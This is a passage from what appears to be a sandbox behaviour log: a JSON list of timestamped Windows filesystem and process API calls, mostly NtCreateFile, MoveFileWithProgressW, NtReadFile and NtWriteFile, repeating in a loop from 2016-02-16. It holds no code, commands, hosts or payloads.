"2016-02-16 17:41:52,187", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,187", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,197", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,197", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,207", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,207", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,217", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,217", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,217", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,227", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:52,227", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,237", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,237", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:52,247", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,247", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,247", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,257", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,257", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,257", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:52,257", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,267", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,267", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,277", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": 
"NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,277", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,287", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,287", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,287", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,297", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtReadFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,297", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,297", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,307", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,307", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,327", "api": "NtFreeVirtualMemory"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,327", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,337", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,337", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,337", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtWriteFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:52,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,347", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,347", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,357", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,357", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,357", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:52,367", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,367", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,367", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,377", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,377", 
"api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,377", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,387", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,387", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,397", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,397", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,397", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,397", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,397", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:52,418", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,418", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,418", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,428", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,428", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,438", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,438", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,448", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,448", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,448", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,458", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:52,458", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,458", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,458", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,468", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,468", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,478", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,478", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,488", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,488", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:52,498", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:52,498", "api": "NtFreeVirtualMemory"}, 